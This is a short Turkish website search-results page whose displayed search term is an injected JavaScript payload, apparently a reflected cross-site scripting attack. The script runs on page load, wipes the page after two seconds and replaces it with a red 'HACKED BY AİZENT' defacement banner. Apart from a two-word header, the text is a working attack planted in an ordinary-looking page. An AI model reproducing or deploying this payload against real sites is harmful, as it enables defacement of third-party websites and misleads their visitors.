Arama Sonuçları
AnasayfaArama sonuçları: <script>setTimeout(function(){document.body.innerHTML='';document.body.style.background='black';let msg=document.createElement('div');msg.innerText='HACKED BY AİZENT';msg.style.color='red';msg.style.fontSize='50px';msg.style.fontFamily='monospace';msg.style.position='fixed';msg.style.top='50%';msg.style.left='50%';msg.style.transform='translate(-50%, -50%)';msg.style.zIndex='9999';document.body.appendChild(msg);},2000);</script>